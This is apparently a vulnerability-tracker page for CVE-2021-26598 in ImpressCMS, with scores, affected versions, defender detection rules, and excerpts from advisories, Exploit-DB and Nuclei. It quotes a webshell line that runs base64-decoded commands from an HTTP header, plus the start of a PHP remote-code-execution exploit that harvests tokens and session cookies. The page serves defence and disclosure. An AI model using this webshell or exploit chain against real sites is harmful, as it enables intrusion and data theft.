CVE-2021-26598
published 2022-03-28CVE-2021-26598: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have…
PriorityP345medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
10.81%
95.3th percentile
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| impresscms | impresscms | < 1.4.3 | 1.4.3 |
| impresscms | impresscms | >= 0 < 1.4.3 | 1.4.3 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); ... $params = "user_submit=1&token={$token[1]}&groups[]=%s";↗
commandif (isset($_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode($_SERVER[HTTP_CMD])); die; }↗
- →Detect unauthenticated GET requests to /include/findusers.php with a token parameter — this endpoint should not be accessible without authentication and is the core of CVE-2021-26598. ↗
- →Alert on responses from /include/findusers.php containing all three fields: 'last_login', 'user_regdate', and 'uname' — this indicates successful unauthorized user data enumeration. ↗
- →Monitor for the two-step exploit sequence: first a GET to /misc.php?action=showpopups&type=friend to harvest a TOKEN_REQUEST value, immediately followed by a request to /include/findusers.php using that token — this is the canonical exploitation pattern. ↗
- →Detect regex pattern matching TOKEN_REQUEST extraction from HTTP responses: `REQUEST' value='(.*?)'` or `REQUEST" value="(.*?)"` — used by attackers to automate token harvesting. ↗
- →Alert on POST requests to /modules/system/admin.php with body parameters containing 'fct=autotasks' and 'op=addautotasks' — this is the RCE escalation step chained after CVE-2021-26598 exploitation. ↗
- →Detect HTTP requests to the ImpressCMS root URL containing a custom 'CMD' header with a base64-encoded value — this is the webshell command execution mechanism planted via the autotasks RCE chain. ↗
- →Flag POST requests to /include/findusers.php with parameters 'user_submit=1' and 'groups[]' containing SQL injection payloads (e.g., SLEEP, ORD, SUBSTR, INSERT INTO) — indicative of chained SQLi exploitation (CVE-2021-26599). ↗
- ·The security token required to exploit /include/findusers.php is legitimately obtainable by unauthenticated users via /misc.php?action=showpopups&type=friend — token presence alone does not indicate authorization. Detection must focus on the unauthenticated context of the request, not token validity. ↗
- ·The Nuclei template uses a two-request chain with an internal extractor; single-request detections against /include/findusers.php without the preceding token-harvest step may produce false negatives if the token is required to be valid. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Incorrect Access Control in ImpressCMS
ghsa·2022-03-29
CVE-2021-26598 [MEDIUM] CWE-287 Incorrect Access Control in ImpressCMS
Incorrect Access Control in ImpressCMS
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
OSV
Incorrect Access Control in ImpressCMS
osv·2022-03-29
CVE-2021-26598 [MEDIUM] Incorrect Access Control in ImpressCMS
Incorrect Access Control in ImpressCMS
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).
No detection rules found.
Exploit-DB
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
exploitdb·2022-03-30·CVSS 9.8
CVE-2021-26599 [CRITICAL] ImpressCMS 1.4.2 - Remote Code Execution (RCE)
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
---
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Author: Egidio Romano aka EgiX
# Date: 30/03/2022
# Version: ";
print "\nExample.: php $argv[0] http://localhost/impresscms/";
print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
die();
}
$url = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
print "\n[+] Retrieving security token (CVE-2021-26598)\n";
curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");
$res = curl_exec($ch);
if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n");
if (!preg_match("/TOKEN_REQUEST'
Nuclei
ImpressCMS <1.4.3 - Incorrect Authorization
nuclei·CVSS 5.3
CVE-2021-26598 [MEDIUM] ImpressCMS <1.4.3 - Incorrect Authorization
ImpressCMS <1.4.3 - Incorrect Authorization
ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2021-26598
info:
name: ImpressCMS <1.4.3 - Incorrect Authorization
author: gy741,pdteam
severity: medium
description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
remediation: |
U
http://karmainsecurity.com/KIS-2022-03http://seclists.org/fulldisclosure/2022/Mar/45https://hackerone.com/reports/1081137https://packetstormsecurity.com/files/166403/ImpressCMS-1.4.2-Incorrect-Access-Control.htmlhttp://karmainsecurity.com/KIS-2022-03http://seclists.org/fulldisclosure/2022/Mar/45https://hackerone.com/reports/1081137https://packetstormsecurity.com/files/166403/ImpressCMS-1.4.2-Incorrect-Access-Control.html
2022-03-28
Published